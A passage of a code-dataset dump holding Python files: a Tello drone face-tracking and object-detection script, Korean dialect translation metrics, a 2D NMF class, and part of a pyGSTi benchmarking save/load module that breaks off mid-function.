route)\n","repo_name":"pedrorivera40/Torpedo","sub_path":"TorpedoBackend/dijkstra_test1.py","file_name":"dijkstra_test1.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17120151621","text":"import cv2\nimport numpy as np\nfrom djitellopy import tello\nimport time\nimport KeyPressModule as kp\nimport cvzone\n\n\n# 임계값 설정\nthres = 0.65\nnmsThres = 0.2 #0.2\n\nclassNames = []\n# 사물 감지를 위한 object dataSet\nclassFile = \"Resources/coco.names\"\n#classNames 에 하나씩 읽어오기\nwith open(classFile, 'rt') as f:\n classNames = f.read().split('\\n')\nprint(classNames)\nconfigPath = 'Resources/ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\nweightPath = 'Resources/frozen_inference_graph.pb'\n\n#네트워크 불러오기 opencv 딥러닝 실행하기 위해서는\nnet = cv2.dnn_DetectionModel(weightPath, configPath)\n\n#set dnn_detectionModel\nnet.setInputSize(320, 320)\nnet.setInputScale(1.0 / 127.5)\nnet.setInputMean((127.5, 127.5, 127.5))\n#opencv BGR를 RGB로 교체\nnet.setInputSwapRB(True)\n\n#키보드 설정\nkp.init()\n#tello 연결\nme = tello.Tello()\n#배터리 표시\nme.connect()\n# 드론 위도우 창에 보여주기 위해 stream\nprint(me.get_battery())\n\nme.streamoff()\nme.streamon()\n\n# 이륙하기\n# me.takeoff()\n# 속도 초기값 설정\n# me.send_rc_control(0, 0, 0, 0)\n# time.sleep(2)\n\n#화면 사이즈 조정\nw, h = 720, 680\n#훈련을 통해 거리유지의 최적의 값을 찾아냄\nfbRange = [5000, 8000]\npid = [0.4, 0.4, 0]\npError = 0\ncap = cv2.VideoCapture(0) #위치 
def findFace(img):\n    # Classify with the Haar cascade classifier\n    faceCasecade = cv2.CascadeClassifier(\"Resources/haarcascade_frontalface_default.xml\")\n    imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    # Detect faces (scaleFactor 1.2 with minNeighbors 8 works best!)\n    faces = faceCasecade.detectMultiScale(imgGray, 1.2, 8)\n\n    # center x ,y\n    myFaceListC = []\n    myFaceListArea = []\n    # Object detection\n    # Pass the threshold via confThreshold and the NMS threshold via nmsThreshold\n    classIds, confs, bbox = net.detect(img, confThreshold=thres, nmsThreshold=nmsThres)\n    try:\n        for classId, conf, box in zip(classIds.flatten(), confs.flatten(), bbox):\n            cvzone.cornerRect(img, box)\n            # putText object name; class names start at 1; conf is 0.xx, so multiply by 100 and round to 2 decimals\n            cv2.putText(img, f'{classNames[classId - 1].upper()} {round(conf * 100, 2)}',\n                        # offset by +10, +30 from x:0 y:0 of the box\n                        (box[0] + 10, box[1] + 30), cv2.FONT_HERSHEY_COMPLEX,\n                        1, (0, 255, 0), 2)\n        # for coconames object detection\n    except:\n        pass\n\n    # Use the coordinate info of each detected face\n    for (x, y, w, h) in faces:\n        # Mark the face position\n        cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n        cx = x + w // 2\n        cy = y + h // 2\n        area = w * h\n        # Mark the center point\n        cv2.circle(img, (cx, cy), 10, (0, 255, 0), cv2.FILLED)\n        myFaceListC.append([cx, cy])\n        myFaceListArea.append(area)\n    #\n    if len(myFaceListArea) != 0:\n\n        i = myFaceListArea.index(max(myFaceListArea))\n        return img, [myFaceListC[i], myFaceListArea[i]]\n    else:\n        return img, [[0, 0], 0]\n\n\ndef trackFace(info, w, pid, pError):\n    # Correct the drone's position when the face leaves the target area\n    area = info[1]\n    x, y = info[0]\n    fb = 0\n\n    error = x - w // 2\n    speed = pid[0] * error + pid[1] * (error - pError)\n    speed = int(np.clip(speed, -30, 30))\n    # Hold position while the area stays between 5000 and 8000\n    if area > fbRange[0] and area < fbRange[1]:\n\n        fb = 0\n        print(\"between\",area)\n\n    # Above 8000 the face looks too large, so the drone moves back\n    elif area > fbRange[1]: # 8000\n        fb = -20\n        print(\"over\", area)\n        time.sleep(0.5)\n        me.send_rc_control(0, fb, 0, speed)\n\n\n    # Below 5000 the face looks too small, so the drone moves forward\n    elif area < fbRange[0] and area != 0: # 5000\n        fb = 20\n        print(\"under\", area)\n        time.sleep(0.5)\n        me.send_rc_control(0, fb, 0, speed)\n\n\n\n\n    if x == 0:\n        speed = 0\n        error = 0\n    # me.send_rc_control(0, fb, 0, speed)\n\n    return error\n\n# Adjust the speeds from the keyboard\ndef getKeyboardInput():\n    lr, fb, ud, yv = 0, 0, 0, 0\n    speed = 50\n\n    if kp.getKey(\"LEFT\"): lr = -speed\n    elif kp.getKey(\"RIGHT\"): lr = speed\n\n    if kp.getKey(\"UP\"): fb = speed\n    elif kp.getKey(\"DOWN\"): fb = -speed\n\n    if kp.getKey(\"w\"): ud = speed\n    elif kp.getKey(\"s\"): ud = -speed\n\n    if kp.getKey(\"a\"): yv = -speed\n    elif kp.getKey(\"d\"): yv = speed\n\n    if kp.getKey(\"q\"):\n        me.land()\n\n\n    if kp.getKey(\"t\"): me.takeoff()\n\n    if kp.getKey(\"z\"):\n        cv2.imwrite(f'Resources/Images/{time.time()}.jpg',img)\n\n\n    return [lr, fb, ud, yv]\n\n# cap = cv2.VideoCapture(0) # adjust the capture position/index as needed\n\nwhile True:\n    # _, img = cap.read()\n\n    vals = getKeyboardInput()\n    me.send_rc_control(vals[0], vals[1], vals[2], vals[3])\n    img = me.get_frame_read().frame\n    img = cv2.resize(img, (w, h))\n    img, info = findFace(img)\n    pError = trackFace(info, w, pid, pError)\n    # print(\"center\",info[0],\"Area\",info[1])\n    cv2.imshow(\"Output\", img)\n\n    if cv2.waitKey(1) & kp.getKey(\"q\"):\n        me.land()\n        cv2.destroyAllWindows()\n        break\n","repo_name":"hp0724/Drone_Project_with_pose_estimation","sub_path":"FaceTracking_ObjectDetection.py","file_name":"FaceTracking_ObjectDetection.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"28727708751","text":"from collections import Counter\nimport numpy as np\nfrom 
nltk import ngrams\nimport nltk.translate.bleu_score as bleu\n\ndef word_accuracy_oov(sentence_list, word_dict):\n size = 0\n count = 0\n for std, dia, inf in sentence_list:\n word_dict_std = std.split()\n word_list_dia = dia.split()\n word_list_inf = inf.split()\n for i in range(len(word_list_dia)):\n if word_dict_std[i] not in word_dict:\n #print(word_dict_std[i], word_list_dia[i], word_list_inf[i])\n size = size + 1\n if word_list_dia[i] == word_list_inf[i]:\n count = count + 1\n\n return count / size\n\ndef word_accuracy(sentence_list):\n size = 0\n count = 0\n\n for std, dia, inf in sentence_list:\n word_list_dia = dia.split()\n word_list_inf = inf.split()\n for i in range(len(word_list_dia)):\n size = size + 1\n if word_list_dia[i] == word_list_inf[i]:\n count = count + 1\n\n return count / size\n\ndef sentence_accuracy(sentence_list):\n size = len(sentence_list)\n count = 0\n\n for std, dia, inf in sentence_list:\n if dia == inf:\n count = count + 1\n return count / size\n\ndef bleu_score(sentence_list, n_gram=4):\n weights = [1./ n_gram for _ in range(n_gram)]\n \n try:\n smt_func = bleu.SmoothingFunction()\n score = 0.0\n \n for _, dia, inf in sentence_list:\n score += bleu.sentence_bleu([dia.split()],\n inf.split(),\n weights,\n smoothing_function=smt_func.method2)\n if len(sentence_list) == 0: \n return 0\n else :\n return score / len(sentence_list)\n except Exception as ex:\n print(ex)\n return 0\n\n\n","repo_name":"NUGO-NLP/korean-standard-to-dialect","sub_path":"baseline/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"62"} +{"seq_id":"34078419961","text":"import numpy as np\nimport time\n\n\ndef timemeasure(func):\n def wrapper(*args, **kargs):\n start_time = time.perf_counter()\n result = func(*args, **kargs)\n end_time = time.perf_counter()\n execution_time = end_time - start_time\n print(f'Proc-time: {execution_time}')\n return result\n return wrapper\n\nclass NMF2D():\n def __init__(self, n_basis, n_frames, n_pitches, n_iter,\n init_W=None, H_sparsity=0.0):\n self.n_basis = n_basis\n self.n_frames = n_frames\n self.n_pitches = n_pitches\n self.n_iter = n_iter\n self.init_W = init_W\n self.err = [0.0 for k in range(0, n_iter)]\n self.eps = np.spacing(1)\n self.H_penalty = H_sparsity\n self.H_norm_order = 0.5\n\n def __init_WH(self, V):\n self.Vmax = np.max(V)\n self.Ones = np.ones(V.shape)\n self.n_row, self.n_col = V.shape\n init_H = 0.5 + 0.5*np.random.random((self.n_basis, self.n_pitches, self.n_col))\n init_W = 0.5*np.random.random((self.n_row, self.n_basis, self.n_frames))\n init_W[:,:,0] = 0.5*np.ones((self.n_row, self.n_basis))\n\n return init_W, init_H \n \n def __W_regularization(self, W, order=2):\n return 0.0#np.tile(self.W_penalty*np.linspace(0, 1.0, self.n_frames)**order, (self.n_row, self.n_basis, 1))\n\n def __H_regularization(self, H):\n return self.H_penalty * self.__norm(H, (self.H_norm_order-2))\n \n def __update_W(self, V, W, H, order=2.0):\n VL, _ = self.__compute_VL(V, W, H)\n W_num, W_denom = np.zeros(W.shape), np.zeros(W.shape)\n W_penalty = self.__W_regularization(W)\n \n for t in range(0, self.n_frames):\n for p in range(0, self.n_pitches):\n VLp = self.__shift(VL, p, \"up\")\n HtpT = self.__shift(H[:,p,:], t, \"right\").T\n W_num[:,:,t] += np.dot(VLp, HtpT)\n W_denom[:,:,t] += np.dot(self.Ones, HtpT)\n W_new = np.clip(W*(W_num / (W_denom) + W_penalty), 0.0, self.Vmax)\n return W_new\n \n def __update_H(self, V, W, H):\n 
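# Multiplicative KL update for H: accumulate shift(W_t)^T @ (V / Lambda) over all time and\n        # pitch shifts, then rescale H by the ratio, keeping the sparsity penalty in the denominator.\n        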
VL, _ = self.__compute_VL(V, W, H)\n H_num, H_denom = np.zeros(H.shape), np.zeros(H.shape)\n H_penalty = self.__H_regularization(H)\n \n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n VLt = self.__shift(VL, t, \"left\")\n WtT = self.__shift(W[:,:,t], p, \"down\").T\n H_num[:,p,:] += np.dot(WtT, VLt)\n H_denom[:,p,:] += np.dot(WtT, self.Ones)\n H_new = np.clip(H*(H_num / (H_denom + H_penalty + self.eps)), 0.0, self.Vmax)\n \n return H_new\n \n def __norm(self, X, order):\n return np.sum(np.abs(X)**order)**(1.0/order)\n \n def __loss(self, V, W, H):\n VL, L = self.__compute_VL(V, W, H)\n Ckl = V * np.nan_to_num(np.log(VL)) - V + L\n W_reg = 0.0#self.__norm(self.__W_regularization(), 2)\n H_reg = self.H_penalty * self.__norm(H, (self.H_norm_order))\n return Ckl.sum() + W_reg + H_reg \n \n @timemeasure\n def fit(self, V):\n W, H = self.__init_WH(V)\n for i in range(0, self.n_iter):\n W = self.__update_W(V, W, H)\n W, H = self.normalize_WH(W, H)\n H = self.__update_H(V, W, H)\n W, H = self.normalize_WH(W, H)\n self.err[i] = self.__loss(V, W, H)\n print(i+1, self.err[i]) \n self.W, self.H = W, H\n return W, H\n\n def __shift(self, X, n, direction):\n if n == 0:\n return X\n M, N = X.shape\n Ret = np.zeros((M,N))\n if direction == \"right\":\n Ret[:,n::] = X[:,0:N-n]\n elif direction == \"left\":\n Ret[:,0:N-n] = X[:,n:N]\n elif direction == \"down\":\n Ret[n::,:] = X[0:M-n,:]\n elif direction == \"up\":\n #Ret[0:M-n,:] = X[n:M,:]\n Ret = np.r_[X[n:M,:],np.zeros((n,N))]\n return Ret\n\n def __convolution(self, W, H, factrize=False):\n V = np.zeros((self.n_row, self.n_col))\n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n Wtmp = self.__shift(W[:,:,t], p, \"down\")\n Htmp = self.__shift(H[:,p,:], t, \"right\")\n V += np.dot(Wtmp, Htmp)\n return V\n\n def get_sources(self, W, H):\n S = np.zeros((self.n_row, self.n_col, self.n_basis))\n \n for p in range(0, self.n_pitches):\n for t in range(0, self.n_frames):\n Wtmp = self.__shift(W[:,:,t], p, \"down\")\n Htmp = self.__shift(H[:,p,:], t, \"right\")\n for k in range(0, self.n_basis):\n S[:,:,k] += np.outer(Wtmp[:,k], Htmp[k,:])\n return S \n \n def __compute_VL(self, V, W, H, eps=np.spacing(1)):\n L = self.__convolution(W, H)\n VL = np.nan_to_num(V/L)\n return VL, L\n\n def normalize_WH(self, W, H, return_2d=False):\n W2d = np.reshape(W, (self.n_row, self.n_basis*self.n_frames))\n H2d = np.reshape(H, (self.n_basis*self.n_pitches, self.n_col))\n \n for k in range(0, self.n_basis):\n fact = np.sum(W2d[:,k])\n W2d[:,k] /= fact\n H2d[k,:] *= fact\n \n if return_2d:\n return W2d, H2d\n else:\n W = np.reshape(W2d, (self.n_row, self.n_basis, self.n_frames))\n H = np.reshape(H2d, (self.n_basis, self.n_pitches, self.n_col))\n return W, H\n\n def reconstruct(self, W, H):\n return self.__convolution(W, H)\n ","repo_name":"Kurene/NMF2D","sub_path":"nmf2d.py","file_name":"nmf2d.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"38828690953","text":"import ast as _ast\nimport json as _json\nimport os as _os\nimport pickle as _pickle\nimport warnings as _warnings\n\nfrom pygsti.extras.rb import benchmarker as _benchmarker\nfrom pygsti.extras.rb import dataset as _dataset\n# todo : update\nfrom pygsti.extras.rb import sample as _sample\nfrom pygsti import io as _io\nfrom pygsti.circuits import circuit as _cir\nfrom pygsti.data import multidataset as _mds\n\n\n#def load_benchmarking_data(basedir):\n\ndef 
load_benchmarker(directory, load_datasets=True, verbosity=1):\n \"\"\"\n\n \"\"\"\n with open(directory + '/global.txt', 'r') as f:\n globaldict = _json.load(f)\n\n numpasses = globaldict['numpasses']\n speckeys = globaldict['speckeys']\n success_key = globaldict['success_key']\n success_outcome = globaldict['success_outcome']\n dscomparator = globaldict['dscomparator']\n\n if load_datasets:\n dskeys = [dskey.name for dskey in _os.scandir(directory + '/data') if dskey.is_dir()]\n multidsdict = {dskey: _mds.MultiDataSet()for dskey in dskeys}\n\n for dskey in dskeys:\n for passnum in range(numpasses):\n dsfn = directory + '/data/{}/ds{}.txt'.format(dskey, passnum)\n ds = _io.read_dataset(dsfn, collision_action='keepseparate', record_zero_counts=False,\n ignore_zero_count_lines=False, verbosity=verbosity)\n multidsdict[dskey].add_dataset(passnum, ds)\n else:\n multidsdict = None\n\n specs = {}\n for i, speckey in enumerate(speckeys):\n specs[speckey] = load_benchmarkspec(directory + '/specs/{}.txt'.format(i))\n\n summary_data = {'global': {}, 'pass': {}, 'aux': {}}\n predictionkeys = [pkey.name for pkey in _os.scandir(directory + '/predictions') if pkey.is_dir()]\n predicted_summary_data = {pkey: {} for pkey in predictionkeys}\n\n for i, spec in enumerate(specs.values()):\n\n summary_data['pass'][i] = {}\n summary_data['global'][i] = {}\n summary_data['aux'][i] = {}\n for pkey in predictionkeys:\n predicted_summary_data[pkey][i] = {}\n\n structure = spec.get_structure()\n\n for j, qubits in enumerate(structure):\n\n # Import the summary data for that spec and qubit subset\n with open(directory + '/summarydata/{}-{}.txt'.format(i, j), 'r') as f:\n sd = _json.load(f)\n summary_data['pass'][i][qubits] = {}\n for dtype, data in sd['pass'].items():\n summary_data['pass'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n summary_data['global'][i][qubits] = {}\n for dtype, data in sd['global'].items():\n summary_data['global'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n\n # Import the auxillary data\n with open(directory + '/aux/{}-{}.txt'.format(i, j), 'r') as f:\n aux = _json.load(f)\n summary_data['aux'][i][qubits] = {}\n for dtype, data in aux.items():\n summary_data['aux'][i][qubits][dtype] = {int(key): value for (key, value) in data.items()}\n\n # Import the predicted summary data for that spec and qubit subset\n for pkey in predictionkeys:\n with open(directory + '/predictions/{}/summarydata/{}-{}.txt'.format(pkey, i, j), 'r') as f:\n psd = _json.load(f)\n predicted_summary_data[pkey][i][qubits] = {}\n for dtype, data in psd.items():\n predicted_summary_data[pkey][i][qubits][dtype] = {\n int(key): value for (key, value) in data.items()}\n\n benchmarker = _benchmarker.Benchmarker(specs, ds=multidsdict, summary_data=summary_data,\n predicted_summary_data=predicted_summary_data,\n dstype='dict', success_outcome=success_outcome,\n success_key=success_key, dscomparator=dscomparator)\n\n return benchmarker\n\n\ndef write_benchmarker(benchmarker, outdir, overwrite=False, verbosity=0):\n\n try:\n _os.makedirs(outdir)\n if verbosity > 0:\n print(\" - Created `\" + outdir + \"` folder to store benchmarker in txt format.\")\n except:\n if overwrite:\n if verbosity > 0:\n print(\" - `\" + outdir + \"` folder already exists. Will write data into that folder.\")\n else:\n raise ValueError(\"Directory already exists! 
Set overwrite to True or change the directory name!\")\n\n globaldict = {}\n globaldict['speckeys'] = benchmarker._speckeys\n globaldict['numpasses'] = benchmarker.numpasses\n globaldict['success_outcome'] = benchmarker.success_outcome\n globaldict['success_key'] = benchmarker.success_key\n\n if benchmarker.dscomparator is not None:\n\n globaldict['dscomparator'] = {}\n globaldict['dscomparator']['pVal_pseudothreshold'] = benchmarker.dscomparator.pVal_pseudothreshold\n globaldict['dscomparator']['llr_pseudothreshold'] = benchmarker.dscomparator.llr_pseudothreshold\n globaldict['dscomparator']['pVal_pseudothreshold'] = benchmarker.dscomparator.pVal_pseudothreshold\n globaldict['dscomparator']['jsd_pseudothreshold'] = benchmarker.dscomparator.jsd_pseudothreshold\n globaldict['dscomparator']['aggregate_llr'] = benchmarker.dscomparator.aggregate_llr\n globaldict['dscomparator']['aggregate_llr_threshold'] = benchmarker.dscomparator.aggregate_llr_threshold\n globaldict['dscomparator']['aggregate_nsigma'] = benchmarker.dscomparator.aggregate_nsigma\n globaldict['dscomparator']['aggregate_nsigma_threshold'] = benchmarker.dscomparator.aggregate_nsigma_threshold\n globaldict['dscomparator']['aggregate_pVal'] = benchmarker.dscomparator.aggregate_pVal\n globaldict['dscomparator']['aggregate_pVal_threshold'] = benchmarker.dscomparator.aggregate_pVal_threshold\n globaldict['dscomparator']['inconsistent_datasets_detected'] = \\\n benchmarker.dscomparator.inconsistent_datasets_detected\n globaldict['dscomparator']['number_of_significant_sequences'] = int(\n benchmarker.dscomparator.number_of_significant_sequences)\n globaldict['dscomparator']['significance'] = benchmarker.dscomparator.significance\n\n else:\n globaldict['dscomparator'] = None\n\n # Write global details to file\n with open(outdir + '/global.txt', 'w') as f:\n _json.dump(globaldict, f, indent=4)\n\n _os.makedirs(outdir + '/specs')\n _os.makedirs(outdir + '/summarydata')\n _os.makedirs(outdir + '/aux')\n\n for pkey in benchmarker.predicted_summary_data.keys():\n _os.makedirs(outdir + '/predictions/{}/summarydata'.format(pkey))\n\n for i, spec in enumerate(benchmarker._specs):\n structure = spec.get_structure()\n write_benchmarkspec(spec, outdir + '/specs/{}.txt'.format(i), warning=0)\n\n for j, qubits in enumerate(structure):\n summarydict = {'pass': benchmarker.pass_summary_data[i][qubits],\n 'global': benchmarker.global_summary_data[i][qubits]\n }\n fname = outdir + '/summarydata/' + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(summarydict, f, indent=4)\n\n aux = benchmarker.aux[i][qubits]\n fname = outdir + '/aux/' + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(aux, f, indent=4)\n\n for pkey in benchmarker.predicted_summary_data.keys():\n summarydict = benchmarker.predicted_summary_data[pkey][i][qubits]\n fname = outdir + '/predictions/{}/summarydata/'.format(pkey) + '{}-{}.txt'.format(i, j)\n with open(fname, 'w') as f:\n _json.dump(summarydict, f, indent=4)\n\n for dskey in benchmarker.multids.keys():\n fdir = outdir + '/data/{}'.format(dskey)\n _os.makedirs(fdir)\n for dsind in benchmarker.multids[dskey].keys():\n fname = fdir + '/ds{}.txt'.format(dsind)\n _io.write_dataset(fname, benchmarker.multids[dskey][dsind], fixed_column_mode=False)\n\n\ndef create_benchmarker(dsfilenames, predictions=None, test_stability=True, auxtypes=None, verbosity=1):\n if predictions is None:\n predictions = dict()\n if auxtypes is None:\n auxtypes = []\n benchmarker = load_data_into_benchmarker(dsfilenames, 
verbosity=verbosity)\n if test_stability:\n if verbosity > 0:\n print(\" - Running stability analysis...\", end='')\n benchmarker.test_pass_stability(formatdata=True, verbosity=0)\n if verbosity > 0:\n print(\"complete.\")\n\n benchmarker.create_summary_data(predictions=predictions, auxtypes=auxtypes)\n\n return benchmarker\n\n# Todo : just make this and create_benchmarker a single function? This import has been superceded\n# by load_benchmarker\n\n\ndef load_data_into_benchmarker(dsfilenames=None, summarydatasets_filenames=None, summarydatasets_folder=None,\n predicted_summarydatasets_folders=None, verbosity=1):\n \"\"\"\n todo\n\n \"\"\"\n if predicted_summarydatasets_folders is None:\n predicted_summarydatasets_folders = dict()\n elif len(predicted_summarydatasets_folders) > 0:\n assert(summarydatasets_folder is not None)\n #if len(predicted_summarydatasets_folders) > 1:\n # raise NotImplementedError(\"This is not yet supported!\")\n\n if dsfilenames is not None:\n\n # If it is a filename, then we import the dataset from file.\n if isinstance(dsfilenames, str):\n dsfilenames = [dsfilenames, ]\n elif not isinstance(dsfilenames, list):\n raise ValueError(\"dsfilenames must be a str or a list of strings!\")\n\n mds = _mds.MultiDataSet()\n for dsfn_ind, dsfn in enumerate(dsfilenames):\n\n if dsfn[-4:] == '.txt':\n print(dsfn)\n mds.add_dataset(dsfn_ind, _io.read_dataset(dsfn,\n collision_action='keepseparate',\n record_zero_counts=False,\n ignore_zero_count_lines=False,\n verbosity=verbosity))\n\n elif dsfn[-4:] == '.pkl':\n\n if verbosity > 0:\n print(\" - Loading DataSet from pickle file...\", end='')\n with open(dsfn, 'rb') as f:\n mds.add_dataset(dsfn_ind, _pickle.load(f))\n if verbosity > 0:\n print(\"complete.\")\n\n else:\n raise ValueError(\"File must end in .pkl or .txt!\")\n\n # # If it isn't a string, we assume that `dsfilenames` is a DataSet.\n # else:\n\n # ds = dsfilenames\n\n if verbosity > 0: print(\" - Extracting metadata from the DataSet...\", end='')\n\n # To store the aux information about the RB experiments.\n all_spec_filenames = []\n # circuits_for_specfile = {}\n # outdslist = []\n\n # We go through the dataset and extract all the necessary auxillary information.\n for circ in mds[mds.keys()[0]].keys():\n\n # The spec filename or names for this circuits\n specfns_forcirc = mds.auxInfo[circ]['spec']\n # The RB length for this circuit\n # try:\n # l = mds.auxInfo[circ]['depth']\n # except:\n # l = mds.auxInfo[circ]['length']\n # The target bitstring for this circuit.\n # target = mds.auxInfo[circ]['target']\n\n # This can be a string (a single spec filename) or a list, so make always a list.\n if isinstance(specfns_forcirc, str):\n specfns_forcirc = [specfns_forcirc, ]\n\n for sfn_forcirc in specfns_forcirc:\n # If this is the first instance of seeing this filename then...\n if sfn_forcirc not in all_spec_filenames:\n # ... 
we store it in the list of all spec filenames to import later.\n all_spec_filenames.append(sfn_forcirc)\n # And it won't yet be a key in the circuits_for_specfile dict, so we add it.\n # circuits_for_specfile[sfn_forcirc] = {}\n\n # # If we've not yet had this length for that spec filename, we add that as a key.\n # if l not in circuits_for_specfile[sfn_forcirc].keys():\n # circuits_for_specfile[sfn_forcirc][l] = []\n\n # # We add the circuit and target output to the dict for the corresponding spec files.\n # circuits_for_specfile[sfn_forcirc][l].append((circ, target))\n\n # circ_specindices = []\n # for sfn_forcirc in specfns_forcirc:\n # circ_specindices.append(all_spec_filenames.index(sfn_forcirc))\n\n if verbosity > 0:\n print(\"complete.\")\n print(\" - Reading in the metadata from the extracted filenames...\", end='')\n\n # We put RB specs that we create via file import (and the circuits above) into this dict\n rbspecdict = {}\n\n # We look for spec files in the same directory as the datafiles, so we find what that is.\n # THIS REQUIRES ALL THE FILES TO BE IN THE SAME DIRECTORY\n directory = dsfilenames[0].split('/')\n directory = '/'.join(directory[: -1])\n if len(directory) > 0:\n directory += '/'\n\n for specfilename in all_spec_filenames:\n\n # Import the RB spec file.\n rbspec = load_benchmarkspec(directory + specfilename)\n # Add in the circuits that correspond to each spec, extracted from the dataset.\n # rbspec.add_circuits(circuits_for_specfile[specfilename])\n # Record the spec in a list, to be given to an RBAnalyzer object.\n rbspecdict[specfilename] = rbspec\n\n if verbosity > 0:\n print(\"complete.\")\n print(\" - Recording all of the data in a Benchmarker...\", end='')\n\n # Put everything into an RBAnalyzer object, which is a container for RB data, and return this.\n benchmarker = _benchmarker.Benchmarker(rbspecdict, ds=mds, summary_data=None)\n\n if verbosity > 0: print(\"complete.\")\n\n return benchmarker\n\n elif (summarydatasets_filenames is not None) or (summarydatasets_folder is not None):\n\n rbspecdict = {}\n\n # If a dict, its just the keys of the dict that are the rbspec file names.\n if summarydatasets_filenames is not None:\n\n specfiles = list(summarydatasets_filenames.keys())\n\n # If a folder, we look for files in that folder with the standard name format.\n elif summarydatasets_folder is not None:\n specfiles = []\n specfilefound = True\n i = 0\n while specfilefound:\n try:\n filename = summarydatasets_folder + \"/spec{}.txt\".format(i)\n with open(filename, 'r') as f:\n if verbosity > 0:\n print(filename + \" found\")\n specfiles.append(filename)\n i += 1\n except:\n specfilefound = False\n if verbosity > 0:\n print(filename + \" not found so terminating spec file search.\")\n\n for sfn_ind, specfilename in enumerate(specfiles):\n\n rbspec = load_benchmarkspec(specfilename)\n rbspecdict[sfn_ind] = rbspec\n\n summary_data = {}\n predicted_summary_data = {pkey: {} for pkey in predicted_summarydatasets_folders.keys()}\n\n for i, (specfilename, rbspec) in enumerate(zip(specfiles, rbspecdict.values())):\n\n structure = rbspec.get_structure()\n summary_data[i] = {}\n for pkey in predicted_summarydatasets_folders.keys():\n predicted_summary_data[pkey][i] = {}\n\n if summarydatasets_filenames is not None:\n sds_filenames = summarydatasets_filenames[specfilename]\n elif summarydatasets_folder is not None:\n sds_filenames = [summarydatasets_folder + '/{}-{}.txt'.format(i, j) for j in range(len(structure))]\n predsds_filenames_dict = {}\n for pkey, pfolder in 
predicted_summarydatasets_folders.items():\n predsds_filenames_dict[pkey] = [pfolder + '/{}-{}.txt'.format(i, j) for j in range(len(structure))]\n\n for sdsfn, qubits in zip(sds_filenames, structure):\n summary_data[i][qubits] = import_rb_summary_data(sdsfn, len(qubits), verbosity=verbosity)\n\n for pkey, predsds_filenames in predsds_filenames_dict.items():\n for sdsfn, qubits in zip(predsds_filenames, structure):\n predicted_summary_data[pkey][i][qubits] = import_rb_summary_data(\n sdsfn, len(qubits), verbosity=verbosity)\n\n benchmarker = _benchmarker.Benchmarker(rbspecdict, ds=None, summary_data=summary_data,\n predicted_summary_data=predicted_summary_data)\n\n return benchmarker\n\n else:\n raise ValueError(\"Either a filename for a DataSet or filenames for a set of RBSpecs \"\n + \"and RBSummaryDatasets must be provided!\")\n\n\ndef load_benchmarkspec(filename, circuitsfilename=None):\n \"\"\"\n todo\n\n \"\"\"\n #d = {}\n with open(filename) as f:\n d = _json.load(f)\n # for line in f:\n # if len(line) > 0 and line[0] != '#':\n # line = line.strip('\\n')\n # line = line.split(' ', 1)\n # try:\n # d[line[0]] = _ast.literal_eval(line[1])\n # except:\n # d[line[0]] = line[1]\n\n #assert(d.get('type', None) == 'rb'), \"This is for importing RB specs!\"\n\n try:\n rbtype = d['type']\n except:\n raise ValueError(\"Input file does not contain a line specifying the RB type!\")\n assert(isinstance(rbtype, str)), \"The RB type (specified as rbtype) must be a string!\"\n\n try:\n structure = d['structure']\n except:\n raise ValueError(\"Input file does not contain a line specifying the structure!\")\n if isinstance(structure, list):\n structure = tuple([tuple(qubits) for qubits in structure])\n assert(isinstance(structure, tuple)), \"The structure must be a tuple!\"\n\n try:\n sampler = d['sampler']\n except:\n raise ValueError(\"Input file does not contain a line specifying the circuit layer sampler!\")\n assert(isinstance(sampler, str)), \"The sampler name must be a string!\"\n\n samplerargs = d.get('samplerargs', None)\n depths = d.get('depths', None)\n numcircuits = d.get('numcircuits', None)\n subtype = d.get('subtype', None)\n\n if samplerargs is not None:\n assert(isinstance(samplerargs, dict)), \"The samplerargs must be a dict!\"\n\n if depths is not None:\n assert(isinstance(depths, list) or isinstance(depths, tuple)), \"The depths must be a list or tuple!\"\n\n if numcircuits is not None:\n assert(isinstance(numcircuits, list) or isinstance(numcircuits, int)), \"numcircuits must be an int or list!\"\n\n spec = _sample.BenchmarkSpec(rbtype, structure, sampler, samplerargs, depths=depths,\n numcircuits=numcircuits, subtype=subtype)\n\n return spec\n\n\ndef write_benchmarkspec(spec, filename, circuitsfilename=None, warning=1):\n \"\"\"\n todo\n\n \"\"\"\n if spec.circuits is not None:\n if circuitsfilename is not None:\n circuitlist = [circ for sublist in [spec.circuits[l] for l in spec.depths] for circ in sublist]\n _io.write_circuit_list(circuitsfilename, circuitlist)\n elif warning > 0:\n _warnings.warn(\"The circuits recorded in this RBSpec are not being written to file!\")\n\n # with open(filename, 'w') as f:\n # f.write('type rb\\n')\n # f.write('rbtype ' + rbspec._rbtype + '\\n')\n # f.write('structure ' + str(rbspec._structure) + '\\n')\n # f.write('sampler ' + rbspec._sampler + '\\n')\n # f.write('lengths ' + str(rbspec._lengths) + '\\n')\n # f.write('numcircuits ' + str(rbspec._numcircuits) + '\\n')\n # f.write('rbsubtype ' + str(rbspec._rbsubtype) + '\\n')\n # 
